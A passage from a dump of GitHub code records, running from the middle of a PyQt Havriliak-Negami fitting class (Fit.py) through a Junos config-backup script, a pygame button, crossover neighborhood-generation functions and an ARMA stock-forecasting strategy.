np_max\nfrom numpy import min as np_min\nfrom scipy.optimize import least_squares # type: ignore\nfrom scipy.linalg import svd #type: ignore\nfrom math import nextafter\n\nfrom typing import Self \n\nclass Fit(QObject):\n \"\"\"Represent one fit for Havriliak-Negami model with n-relaxation.\n\n Args:\n name (str): Name of fit.\n df (DataFrame): Measurement data(processed data from magnetometer).\n temp (float): Temperature measured during the measurement.\n field (float): Magnetic field strength during measurement.\n compound (SettingsSource): Examined compound.\n collection (Collection | None): The collection to which it belongs.\n\n Attributes:\n name_changed: Emitted when name change. 
Contains new name.\n df_changed: Emitted when at least one row in df changed.\n df_point_deleted: Emitted when row in df is removed.\n deletion_imposible: Emitted when deletion operation could not be performed.\n \"\"\"\n\n name_changed: pyqtSignal = pyqtSignal(str)\n df_changed: pyqtSignal = pyqtSignal()\n df_point_deleted: pyqtSignal = pyqtSignal()\n deletion_imposible:pyqtSignal = pyqtSignal()\n\n @staticmethod\n def model(logFrequency: ndarray, alpha: float, beta: float, tau: float, chi_dif: float, chi_s: float) -> ndarray:\n \"\"\"Implemntation of Havriliak-Negami model\n\n Args:\n logFrequency (ndarray): Logarytm of frequency.\n alpha (float): Alpha parameter\n beta (float): Beta parameter\n tau (float): Time of relaxation.\n chi_dif (float): chi_t - chi_s\n chi_s (float): \n\n Returns:\n ndarray: Model predictions for each point in domain\n \"\"\"\n return chi_s + (chi_dif)/((1 + (10**logFrequency*2*pi * power(10, tau) * 1j )**(1- alpha))**beta)\n\n @staticmethod\n def from_measurement(measurement: Measurement, compound:SettingsSource, nr_of_relaxations: int = 1):\n \"\"\" Create new Fit from Measurement and append it to the collection.\n\n\n Args:\n measurement (Measurement): Measurement from which Fit will be created.\n compound (SettingsSource): Source of boundaries for parameters.\n nr_of_relaxations (int, optional): Number of relaxations in Havriliak-Negami model. Defaults to 1.\n\n Returns:\n Fit: Created Fit\n \"\"\"\n df = measurement._df\n if df.isnull().values.any():\n msg: QMessageBox = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(f\"Some data in measurement named: {measurement._name} is missing.\\n Fit was not created!\")\n msg.setWindowTitle(\"Fit creation canceled\")\n msg.exec()\n return None\n \n fit_name: str = measurement._name + \"_Fit_Frequency\"\n fit: Fit = Fit(fit_name, measurement._df.copy(), measurement._tmp, measurement._field, compound, None)\n\n fit.relaxations = []\n i: int\n for i in range(nr_of_relaxations):\n fit.relaxations.append(Relaxation(compound))\n\n return fit\n def __init__(self, name: str, df: DataFrame, temp: float, field: float, compound:SettingsSource, collection: Collection[\"Fit\"]|None):\n super().__init__()\n self._name: str = name\n self._df: DataFrame = df\n\n self._tmp: float = temp\n self._field: float = field\n\n self.relaxations: list[Relaxation] = []\n\n self._compound: SettingsSource = compound\n self._collection: Collection[\"Fit\"] | None\n if collection is not None:\n self._collection = collection\n\n self._undo_stack: QUndoStack = QUndoStack()\n self.resolution = 50 # TO::DO \n\n for r in self.relaxations:\n r.reset_errors.connect(self.reset_errors_in_all_relaxations)\n\n def reset_errors_in_all_relaxations(self):\n for r in self.relaxations:\n r.set_all_errors(0.0, [0.0,0.0,0.0,0.0,0.0])\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, val:str):\n if len(val) < 1:\n raise ValueError(\"Compund name must be at least one character long\")\n if self._collection is not None:\n self._collection.update_names(old_name=self._name, new_name=val)\n self._name = val\n self.name_changed.emit(val)\n\n class Rename(QUndoCommand):\n def __init__(self, fit: \"Fit\", new_name:str):\n super().__init__()\n self._fit = fit\n self.new_name = new_name\n self.old_name = fit.name\n \n def redo(self) -> None:\n self._fit.name = self.new_name\n\n def undo(self) -> None:\n self._fit.name = self.old_name\n\n class HidePoint(QUndoCommand):\n def __init__(self, fit: \"Fit\", x: float, x_str: 
str):\n super().__init__()\n self.fit: Fit = fit\n self.x: float = x\n self.x_str: str = x_str\n\n def redo(self) -> None:\n self.fit._hide_point(self.x, self.x_str)\n\n def undo(self) -> None:\n self.fit._hide_point(self.x, self.x_str)\n\n class DeletePoint(QUndoCommand):\n def __init__(self, fit: \"Fit\", x: float, x_str: str, error_signal: pyqtBoundSignal):\n\n super().__init__()\n self.fit: Fit = fit\n self.x: float = x\n self.x_str: str = x_str\n self.point: DataFrame = DataFrame()\n self.error_signal = error_signal\n\n def redo(self) -> None:\n try:\n self.point = self.fit._delete_point(self.x, self.x_str)\n except IndexError:\n self.error_signal.emit()\n\n def undo(self) -> None:\n self.fit._df = concat([self.fit._df, self.point])\n self.fit.df_changed.emit()\n\n @property\n def molar_mass(self):\n return self._molar_mass\n\n @molar_mass.setter\n def molar_mass(self, val:float):\n if val <= 0:\n raise ValueError(\"Molar mass must be greater than 0\")\n\n self._molar_mass = val\n\n def set_name(self, new_name: str):\n \"\"\"Sets fit name. This action can be undone.\n\n Args:\n new_name (str): New measurement name\n \"\"\"\n self._undo_stack.push(self.Rename(self, new_name))\n \n def hide_point(self, x: float, x_str: str):\n \"\"\"Change point visibility on the opposite of actual. This action can be undone.\n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n \"\"\"\n self._undo_stack.push(self.HidePoint(self, x, x_str))\n\n def delete_point(self, x: float, x_str: str):\n \"\"\"Delete point. This action can be undone.\n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n\n Raises:\n IndexError: Raised when there is not enough points to delete any more.\n \"\"\"\n self._undo_stack.push(self.DeletePoint(self, x, x_str, self.deletion_imposible))\n\n def _hide_point(self, x: float, x_str: str):\n \"\"\"Hide point \n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n \"\"\"\n actual: bool = bool(self._df.loc[self._df[x_str] == x]['Hidden'].values[0])\n self._df.loc[self._df[x_str] == x, \"Hidden\"] = not actual\n self.df_changed.emit()\n\n def _delete_point(self, x: float, x_str: str):\n \"\"\"Delete point \n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n \"\"\"\n if self._df.shape[0] == 2:\n raise IndexError\n\n point: DataFrame = self._df.loc[self._df[x_str] == x]\n self._df.drop(self._df.loc[self._df[x_str] == x].index, inplace=True)\n self.df_point_deleted.emit()\n return point\n\n\n def cost_function(self, p):\n \"\"\"Cost function minimalized in least_square method in fitting process.\n\n Args:\n p (_type_): Parameters for all relaxations.\n\n Returns:\n _type_: Cost of fit.\n \"\"\"\n rest = self._df.loc[self._df[\"Hidden\"] == False]\n\n sum_real = 0\n sum_img = 0\n i = 0\n while i < len(self.relaxations):\n r = Fit.model(rest[\"FrequencyLog\"].values, p[0+i*5], p[1+i*5], p[2+i*5], p[3+i*5], p[4+i*5])\n sum_real += r.real\n sum_img += -r.imag\n\n i += 1\n\n dif_real = abs((sum_real - rest['ChiPrimeMol']))\n dif_img = abs((sum_img - rest['ChiBisMol']))\n\n\n return dif_real + dif_img\n\n def make_auto_fit(self, auto: bool = False, next_fit: Self = None): # type: ignore\n \"\"\"Solve a nonlinear least-squares problem with bounds on the variables for cost_function().\n\n Args:\n auto (bool, optional): Determines whether fit was explicitly call by user. 
Defaults to False.\n next_fit (Self, optional): Fit to transfer parameters value in case of performing automated fit process for mutiple Fits. Defaults to None.\n \"\"\"\n if len(self.relaxations) == 1:\n not_blocked_parameters:list[Parameter] = []\n blocked_parameters:list[Parameter] = [] \n\n for j, p in enumerate(self.relaxations[0].parameters):\n if p.is_blocked:\n blocked_parameters.append(p)\n else:\n not_blocked_parameters.append(p)\n\n param_str = \"\"\n for p in not_blocked_parameters:\n param_str = param_str +f\", {p.name}\"\n\n not_blocked_names = [p.name for p in not_blocked_parameters]\n not_blocked_params = [p.value for p in not_blocked_parameters]\n\n model_body = \"return {chi_s} + ({chi_dif})/((1 + (10**logFrequency*2*pi * power(10, {tau}) * 1j )**(1- {alpha}))**{beta})\".format(\n chi_s=\"chi_s\" if \"chi_s\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"chi_s\")).value,\n chi_dif=\"chi_dif\" if \"chi_dif\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"chi_dif\")).value,\n tau=\"log10_tau\" if \"log10_tau\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"log10_tau\")).value,\n alpha=\"alpha\" if \"alpha\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"alpha\")).value,\n beta=\"beta\" if \"beta\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"beta\")).value,\n )\n meta_model_str = \"\"\"\ndef m_model(logFrequency {param_str}):\n {model_body}\nself.meta_model = m_model\n \"\"\".format(model_body= model_body, param_str=param_str)\n\n exec(meta_model_str, {\"self\":self, \"pi\":pi, \"power\":power})\n exec(\"\"\"\ndef meta_auto_fit(self):\n def cost_function(p):\n rest = self._df.loc[self._df[\"Hidden\"] == False]\n sum_real = 0\n sum_img = 0\n\n r = self.meta_model(rest[\"FrequencyLog\"].values, *p)\n sum_real += r.real\n sum_img += -r.imag\n\n dif_real = abs((sum_real - rest['ChiPrimeMol']))\n dif_img = abs((sum_img - rest['ChiBisMol']))\n \n return dif_real + dif_img\n \n settings: SettingsReader = SettingsReader()\n tole = settings.get_tolerances()\n\n try:\n try:\n res = least_squares(cost_function, not_blocked_params, ftol=tole[\"f_tol\"], xtol=tole[\"x_tol\"], gtol=tole[\"g_tol\"])\n except ValueError as e:\n msg: QMessageBox = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"One of tolerances is to low. You can adjust them in settings.\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n _, s, Vh = svd(res.jac, full_matrices=False)\n tol = finfo(float).eps * s[0] * np_max(res.jac.shape)\n w = s > tol\n cov = (Vh[w].T/s[w]**2) @ Vh[w] # robust covariance matrix\n\n chi2dof = sum(res.fun**2)/(res.fun.size - res.x.size)\n cov *= chi2dof\n\n perr = sqrt(diag(cov))\n except Exception as e:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"Something went wrong. 
Try change starting values of parameters.\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n\n for i,p in enumerate(not_blocked_parameters):\n p.set_value(res.x[i])\n p.set_error(perr[i], silent=True)\n \n for p in blocked_parameters:\n p.set_error(0.0, silent=True)\n \n self.relaxations[0].residual_error = res.cost\n self.relaxations[0].all_parameters_changed.emit() \n\n \n if auto:\n self.save_all_relaxations()\n if next_fit != None: #type: ignore\n self.copy_all_relxations(next_fit) \n \nmeta_auto_fit(self)\n \"\"\", {\"self\": self, \"SettingsReader\":SettingsReader, \"not_blocked_params\": not_blocked_params, \"QMessageBox\":QMessageBox, \"svd\":svd,\n \"finfo\":finfo, \"np_max\":np_max, \"sum\":sum, \"sqrt\":sqrt, \"not_blocked_parameters\":not_blocked_parameters, \"blocked_parameters\": blocked_parameters,\n \"next_fit\": next_fit, \"least_squares\": least_squares, \"diag\":diag, \"auto\":auto })\n return\n else:\n params: tuple = ()\n min: list = []\n max: list = []\n for r_nr in range(len(self.relaxations)):\n relaxation = self.relaxations[r_nr]\n params = params + relaxation.get_parameters_values()\n min = min + relaxation.get_parameters_min_bounds()\n max = max + relaxation.get_parameters_max_bounds()\n\n \n r: Relaxation\n i: int\n for i, r in enumerate(self.relaxations):\n for j, p in enumerate(r.parameters):\n if p.is_blocked:\n min[j + i*len(r.parameters)] = nextafter(p.value, min[j + i*len(r.parameters)])\n max[j + i*len(r.parameters)] = nextafter(p.value, max[j + i*len(r.parameters)])\n\n bounds: tuple[list[float], list[float]] = (min, max)\n minimal: float = np_min(params)\n maximal: float = np_max(params)\n\n settings: SettingsReader = SettingsReader()\n tole = settings.get_tolerances()\n try:\n try:\n res = least_squares(self.cost_function, params, bounds=bounds, ftol=tole[\"f_tol\"], xtol=tole[\"x_tol\"], gtol=tole[\"g_tol\"])\n except ValueError as e:\n msg: QMessageBox = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"One of tolerances is to low. You can adjust them in settings.\\n\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n\n _, s, Vh = svd(res.jac, full_matrices=False)\n tol = finfo(float).eps * s[0] * np_max(res.jac.shape)\n w = s > tol\n cov = (Vh[w].T/s[w]**2) @ Vh[w] # robust covariance matrix\n\n chi2dof = sum(res.fun**2)/(res.fun.size - res.x.size)\n cov *= chi2dof\n\n perr = sqrt(diag(cov))\n except Exception as e:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"Something went wrong. 
Try change starting values of parameters.\\n\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n\n for i, r in enumerate(self.relaxations):\n for j, p in enumerate(r.parameters):\n p.set_value(res.x[j + i*len(r.parameters)])\n\n for i, r in enumerate(self.relaxations):\n r.set_all_errors(res.cost, perr[i*5 : i*5+5])\n\n if auto:\n self.save_all_relaxations()\n if next_fit != None: #type: ignore\n self.copy_all_relxations(next_fit)\n\n def save_to_file(self):\n \"\"\"Savig result to .csv file\"\"\"\n save_name, _ = QFileDialog.getSaveFileName(QWidget(), 'Save file')\n if save_name is not None:\n try:\n with open(save_name + (\".csv\" if save_name[-4:] != \".csv\" else \"\"), \"w\") as f:\n self.get_result().to_csv(f.name, index=False, sep = \";\")\n except Exception as e:\n print(e)\n return\n\n def get_result(self,) -> DataFrame:\n \"\"\"Get DataFrame with results of fitting process.\n\n Returns:\n DataFrame: Result of fit in DataFrame format.\n \"\"\"\n\n df_param: DataFrame = DataFrame([['T', self._tmp, 0], ['H', self._field, 0]], columns=['Name', 'Value','Error'])\n\n \n df_experimental: DataFrame = self._df[[\"Frequency\", \"ChiPrimeMol\",\"ChiBisMol\"]]\n columns_names: list[str] = [f\"Frequency T={self._tmp} H={self._field}\",\n f\"ChiPrimeMol T={self._tmp} H={self._field}\", f\"ChiBisMol T={self._tmp} H={self._field}\"]\n df_experimental.columns = columns_names\n df_experimental.reset_index(drop=True, inplace=True)\n \n df_model_final: DataFrame = DataFrame()\n for i, r in enumerate(self.relaxations):\n for p in r.saved_parameters:\n name:str = p.name if p.name != \"chi_dif\" else \"chi_t-chi_s\"\n row = { \"Name\": f\"{name}{i+1}\", \"Value\": p.value, \"Error\": p.error}\n df_param = concat([df_param, DataFrame([row])], ignore_index=True)\n\n\n df_model: DataFrame = DataFrame()\n displayed: DataFrame = self._df.loc[self._df[\"Hidden\"] == False]\n\n xx:ndarray = logspace(log10(displayed[\"Frequency\"].min()), log10(displayed[\"Frequency\"].max()), self.resolution)\n df_model[\"Model\"+columns_names[0]] = Series(xx)\n yy = Fit.model(log10(xx), *self.relaxations[i].get_saved_parameters_values())\n df_model[\"Model\"+columns_names[1]] = Series(yy.real)\n df_model[\"Model\"+columns_names[2]] = Series(-yy.imag)\n df_model_final = concat([df_model_final, df_model], axis=1)\n\n if i != 0:\n columns = list(df_model_final.columns)\n for j in range(0, len(columns), 3):\n rel_str:str = f\" rel_nr={j//3 + 1}\"\n columns[j] += rel_str\n columns[j+1] += rel_str\n columns[j+2] += rel_str\n df_model_final.columns = columns\n\n df: DataFrame = concat([df_param, df_experimental, df_model_final], axis=1)\n return df\n\n def save_all_relaxations(self):\n \"\"\"Save current parameters of all relaxations.\n \"\"\"\n for r in self.relaxations:\n r.save()\n\n def copy_all_relxations(self, other: Self): #type: ignore\n \"\"\"Copy saved parameters for all relaxations\"\"\"\n for i, r in enumerate(other.relaxations): #type: ignore\n r.copy(self.relaxations[i])\n\n def get_jsonable(self) -> dict:\n \"\"\"Marshal object to python dictionary.\n\n Returns:\n dict: Dictionary ready to save as .json\n \"\"\"\n\n r_list: list[dict] = []\n for r in self.relaxations:\n r_list.append(r.get_jsonable())\n jsonable = {\n \"name\": self._name, \n \"df\": self._df.to_json(),\n \"tmp\": self._tmp,\n \"field\": self._field,\n \"relaxations\": r_list\n }\n return jsonable\n\n def update_relaxations_from_json(self, relaxations_json: list[dict]):\n \"\"\"From given dictionary recreate 
saved state of relaxations.\n\n Args:\n relaxations_json (list[dict]): Result of self.get_jsonable()\n \"\"\"\n self.relaxations = []\n for i, r_j in enumerate(relaxations_json):\n r: Relaxation = Relaxation(self._compound)\n r.residual_error = r_j[\"residual_error\"]\n r.saved_residual_error = r_j[\"saved_residual_error\"]\n r.was_saved = r_j[\"was_saved\"]\n \n for j, p in enumerate(r.parameters):\n p.update_from_json(r_j[\"parameters\"][j])\n\n for k, s_p in enumerate(r.saved_parameters):\n s_p.update_from_json(r_j[\"saved_parameters\"][k])\n\n self.relaxations.append(r)\n\n def undo(self):\n self._undo_stack.undo()\n\n def redo(self):\n self._undo_stack.redo()","repo_name":"ZychuDev/relACs","sub_path":"models/Fit.py","file_name":"Fit.py","file_ext":"py","file_size_in_byte":21370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42243235762","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport json\nimport yaml\nimport argparse\nfrom pathlib import Path\n\nfrom jnpr.junos import Device\nfrom jnpr.junos.utils.config import Config\nfrom jnpr.junos.exception import ConnectError\n\nfrom lxml import etree\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--sshconfig', help='SSH config file', default='~/.ssh/config_homer')\nparser.add_argument('-d', '--outputdir', help='Directory for saved config files', default='saved_configs')\nparser.add_argument('-t', '--topology_file', help='Location of containerlab topology file.', required=True)\nargs = parser.parse_args()\n\ndef main():\n Path(f\"{args.outputdir}\").mkdir(exist_ok=True, parents=True)\n\n with open(args.topology_file, 'r') as topology_file:\n clab = yaml.safe_load(topology_file)\n\n for node_name, node_conf in clab['topology']['nodes'].items():\n if node_conf['kind'] in ['vr-vqfx', 'vr-vmx', 'crpd']:\n print(f\"Connecting to {node_name}... 
\", end=\"\", flush=True)\n junos_dev = get_junos_dev(node_name)\n config = junos_dev.rpc.get_config(options={'format':'json'})\n with open(f\"{args.outputdir}/{node_name}.json\", \"w\") as config_file:\n config_file.write(json.dumps(config))\n config = junos_dev.rpc.get_config(options={'format':'set'})\n with open(f\"{args.outputdir}/{node_name}.cfg\", \"w\") as config_file:\n config_file.write(etree.tostring(config, encoding='unicode'))\n print(\"saved ok.\")\n\n\ndef get_junos_dev(dev_name):\n # Initiates NETCONF session to router\n try:\n device = Device(dev_name, ssh_config=args.sshconfig, port=22)\n device.open()\n except ConnectError as err:\n print(f\"Cannot connect to device: {err}\")\n sys.exit(1)\n\n # Get config object\n device.bind(config=Config)\n\n return device\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"topranks/homerlabs","sub_path":"save_junos_configs.py","file_name":"save_junos_configs.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24144730232","text":"import pygame\npygame.font.init() # you have to call this at the start, \n # if you want to use this module.\nmy_font = pygame.font.SysFont('Comic Sans MS', 30)\nclass Button:\n\n def __init__(self, text, x, y, onClick, width=100, height=50):\n self.text = text\n self.rect = pygame.Rect(x, y, width, height)\n self.color = (120, 120, 120)\n self.onClick = onClick\n\n def draw(self, screen):\n pygame.draw.rect(screen, self.color, self.rect)\n screen.blit(my_font.render(self.text, False, (255, 255, 255)), (self.rect.x, self.rect.y))\n\n def update(self, clicked):\n x, y = pygame.mouse.get_pos()\n if(self.rect.collidepoint((x, y))):\n self.color = (60, 60, 60)\n if(clicked):\n self.onClick()\n else:\n self.color = (120, 120, 120)\n \n","repo_name":"arifo99/ticTacToeBot","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36816230785","text":"\nimport random\nimport numpy as np\n\nneighgen_operators = ['cxOnePoint',\n 'cxTwoPoint',\n 'cxUniform',\n 'cxBlend',\n 'cxUniformBlend',\n 'sxSuppress'\n ]\n\n\ndef cxOnePoint(ind1, ind2):\n size = min(len(ind1), len(ind2))\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n cxpoint = random.randint(1, size - 1)\n ind1[cxpoint:], ind2[cxpoint:] = ind2o[cxpoint:], ind1o[cxpoint:]\n\n return ind1, ind2\n\n\ndef cxTwoPoint(ind1, ind2):\n size = min(len(ind1), len(ind2))\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n cxpoint1 = random.randint(1, size)\n cxpoint2 = random.randint(1, size - 1)\n if cxpoint2 >= cxpoint1:\n cxpoint2 += 1\n else: # Swap the two cx points\n cxpoint1, cxpoint2 = cxpoint2, cxpoint1\n\n ind1[cxpoint1:cxpoint2], ind2[cxpoint1:cxpoint2] \\\n = ind2o[cxpoint1:cxpoint2], ind1o[cxpoint1:cxpoint2]\n\n return ind1, ind2\n\n\ndef cxUniform(ind1, ind2, indpb):\n size = min(len(ind1), len(ind2))\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n for i in range(size):\n if random.random() < indpb:\n ind1[i], ind2[i] = ind2o[i], ind1o[i]\n\n return ind1, ind2\n\n\ndef cxBlend(ind1, ind2, alpha):\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n for i, (x1, x2) in enumerate(zip(ind1o, ind2o)):\n ind1[i] = (1. - alpha) * x1 + alpha * x2\n ind2[i] = alpha * x1 + (1. 
- alpha) * x2\n\n return ind1, ind2\n\n\ndef cxUniformBlend(ind1, ind2, indpb, alpha):\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n for i, (x1, x2) in enumerate(zip(ind1o, ind2o)):\n if random.random() < indpb:\n ind1[i] = (1. - alpha) * x1 + alpha * x2\n ind2[i] = alpha * x1 + (1. - alpha) * x2\n\n return ind1, ind2\n\n\ndef sxSuppress(ind, base, indpb):\n for i in range(len(ind)):\n if random.random() < indpb:\n idx_base = i if len(base) == len(ind) else 0\n ind[i] = base[idx_base]\n\n return ind\n\n\ndef dang_neighborhood_generation(x, X_S, n_samples=1000, indpb=0.5, neighgen_op=None, base=None):\n\n Z = list()\n n_samples_per_support = max(1, n_samples // len(X_S))\n neighgen_op = neighgen_operators if neighgen_op is None else neighgen_op\n neighgen_op_support = [op for op in neighgen_op if op.startswith('cx')]\n\n for xs in X_S:\n for i in range(n_samples_per_support):\n x_i, xs_i = x.deepcopy(), xs.deepcopy()\n op_id = np.random.choice(neighgen_op_support)\n\n if op_id == 'cxOnePoint':\n x_i, xs_i = cxOnePoint(x_i, xs_i)\n elif op_id == 'cxTwoPoint':\n x_i, xs_i = cxTwoPoint(x_i, xs_i)\n elif op_id == 'cxUniform':\n x_i, xs_i = cxUniform(x_i, xs_i, indpb)\n elif op_id == 'cxBlend':\n alpha = np.random.choice(np.arange(0.1, 1.0, 0.1))\n x_i, xs_i = cxBlend(x_i, xs_i, alpha)\n elif op_id == 'cxUniformBlend':\n alpha = np.random.choice(np.arange(0.1, 1.0, 0.1))\n x_i, xs_i = cxUniformBlend(x_i, xs_i, indpb, alpha)\n\n Z.append(x_i)\n Z.append(xs_i)\n\n if base is not None and 'sxSuppress' in neighgen_op:\n for i in range(n_samples_per_support):\n x_i = x.deepcopy()\n x_i = sxSuppress(x_i, base, indpb)\n Z.append(x_i)\n\n idx = np.random.choice(len(Z), size=n_samples, replace=False)\n Z = [z for i, z in enumerate(Z) if i in idx]\n return Z\n\n","repo_name":"riccotti/DAG","sub_path":"code/dang_neighgen.py","file_name":"dang_neighgen.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31758715966","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pylab as plt\nplt.rcParams['font.sans-serif']=['SimHei']\nfrom matplotlib.pylab import rcParams\nfrom statsmodels.tsa.stattools import adfuller\nimport pickle\nfrom statsmodels.graphics.tsaplots import plot_pacf, plot_acf\nimport statsmodels\nfrom statsmodels.tsa.arima_model import ARMA\nfrom statsmodels.tsa.arima_model import ARIMA\nimport re\nimport numpy\n\n\nclass Strategy:\n def __init__(self, industry_code):\n self.industry_code = industry_code\n self.intern = pickle.load(open(r'D:/Data/intern.pkl', 'rb'))\n self.MktData = self.intern['MktData']\n self.InstrumentInfo = self.intern['InstrumentInfo']\n self.code_first_MktData = self.MktData.swaplevel(0, 1, axis=1)\n\n def get_industry_descendant(self, industry_code, industry_order=1):\n stock_SWICS = self.intern['InstrumentInfo']['SWICS']\n pattern = re.compile(industry_code[0:industry_order])\n descendant = []\n for index, stock in zip(self.intern['InstrumentInfo'].index, stock_SWICS):\n if re.match(pattern, stock):\n descendant.append(index)\n return np.asarray(descendant)\n\n\n def category_index(self, industry_code, train_size=50):\n descendant = self.get_industry_descendant(industry_code, industry_order=3)\n industry_all = pd.DataFrame()\n yesterday_ret_cumsum = []\n for stock in descendant:\n try:\n industry_all[stock] = self.code_first_MktData[str(stock)]['ret'][-train_size:-1].as_matrix()\n except KeyError:\n continue\n no_NaN 
= industry_all.dropna(axis=1, how='any')\n industry_cumsum = no_NaN.cumsum()\n industry_index = industry_cumsum.mean(1)\n industry_index.index = self.MktData.index[-train_size:-1]\n extra_stock_performance = industry_cumsum.sub(industry_cumsum.mean(axis=1), axis=0)\n extra_stock_performance.index = self.MktData.index[-train_size:-1]\n return industry_index, extra_stock_performance, yesterday_ret_cumsum\n\n def arma_forecast(self, ts, p, q,):\n arma = ARMA(ts, order=(p, q)).fit(disp=-1)\n ts_predict = arma.predict()\n next_ret = arma.forecast(1)[0]\n #print(\"Forecast stock extra return of next day: \", next_ret)\n # plt.clf()\n # plt.plot(ts_predict, label=\"Predicted\")\n # plt.plot(ts, label=\"Original\")\n # plt.legend(loc=\"best\")\n # plt.title(\"AR Test {},{}\".format(p, q))\n # #plt.show()\n return next_ret, arma.summary2()\n\n def arima_forecast(self, ts, p, i, q,):\n arima = ARIMA(ts, order=(p, i, q)).fit(disp=-1)\n ts_predict = arima.predict()\n next_ret = arima.forecast(1)[0]\n #print(\"Forecast stock extra return of next day: \", next_ret)\n # plt.clf()\n # plt.plot(ts_predict, label=\"Predicted\")\n # plt.plot(ts, label=\"Original\")\n # plt.legend(loc=\"best\")\n # plt.title(\"AR Test {},{}\".format(p, q))\n # #plt.show()\n return next_ret, arima.summary2()\n\n\ndef main():\n test_strategy = Strategy('280201')\n industry_index, extra_stock_performance, yesterday_ret_cumsum = test_strategy.category_index(test_strategy.industry_code)\n # plt.plot(industry_index, label='Industry Index')\n # for stock in extra_stock_performance.columns:\n # plt.plot(extra_stock_performance[stock], label=stock)\n # plt.legend(loc=\"best\")\n # plt.show()\n # print(industry_index.shape)\n # print(extra_stock_performance.shape)\n factor = pd.Series(index=extra_stock_performance.columns)\n summary = {}\n for i, stock in enumerate(extra_stock_performance.columns):\n stock_predict_arma, stock_summary_arma = test_strategy.arma_forecast(extra_stock_performance[stock], 1, 0)\n summary[stock] = stock_summary_arma\n factor[i] = float(stock_predict_arma)\n # stock_predict_arima, stock_summary_arima = test_strategy.arima_forecast(extra_stock_performance[stock], 1, 0, 0)\n # if stock_predict_arma-yesterday_ret_cumsum[i] > 0:\n # print(\"Predicted extra ret of ARMA is:{} bigger than 0,suggested sell out\".format(stock_predict_arma-yesterday_ret_cumsum[i]))\n # else:\n # print(\"Predicted extra ret of ARMA is:{} less than 0,suggested buy in\".format(stock_predict_arma-yesterday_ret_cumsum[i]))\n # if stock_predict_arima-yesterday_ret_cumsum[i] > 0:\n # print(\"Predicted extra ret of ARIMA is:{} bigger than 0,suggested sell out\".format(stock_predict_arima-yesterday_ret_cumsum[i]), stock_predict_arima)\n # else:\n # print(\"Predicted extra ret of ARIMA is:{} less than 0,suggested buy in\".format(stock_predict_arima-yesterday_ret_cumsum[i]), stock_predict_arima)\n return factor, summary\n\n\nif __name__ == '__main__':\n factor, summary = main()\n # x = factor.index\n # y = factor\n # #fig = plt.figure(figsize=(15,2))\n # plt.scatter(x, y)\n # plt.plot([x[0],x[-1]], [0,0], color='r')\n # for a, b in zip(x, y):\n # plt.text(a, b + 0.01, '{0:.5}'.format(b), ha='center', va='bottom', fontsize=7)\n # plt.title(\"280000\")\n # plt.xlabel(\"Stock Code\")\n # plt.ylabel(\"Diviation of each stock from index\")\n # plt.xticks([])\n # plt.show()\n\n\n\n\n # temp = np.array(ret)\n # t = statsmodels.tsa.stattools.adfuller(temp) # ADF检验\n # output = pd.DataFrame(index=['Test Statistic Value', \"p-value\", \"Lags Used\", 
\"Number of Observations Used\",\"Critical Value(1%)\",\"Critical Value(5%)\",\"Critical Value(10%)\"],columns=['value'])\n # output['value']['Test Statistic Value'] = t[0]\n # output['value']['p-value'] = t[1]\n # output['value']['Lags Used'] = t[2]\n # output['value']['Number of Observations Used'] = t[3]\n # output['value']['Critical Value(1%)'] = t[4]['1%']\n # output['value']['Critical Value(5%)'] = t[4]['5%']\n # output['value']['Critical Value(10%)'] = t[4]['10%']\n # print(output)\n\n #\n import statsmodels.api as sm\n # sm.tsa.arma_order_select_ic(temp,max_ar=6,max_ma=4,ic='aic')['aic_min_order'] # AIC\n # sm.tsa.arma_order_select_ic(temp,max_ar=6,max_ma=4,ic='bic')['bic_min_order'] # BIC\n # sm.tsa.arma_order_select_ic(temp,max_ar=6,max_ma=4,ic='hqic')['hqic_min_order'] # HQIC\n\n # order = (1, 1)\n # train = ret[:-50]\n # test = ret[-50:]\n # tempModel = sm.tsa.ARMA(train, order).fit()\n # 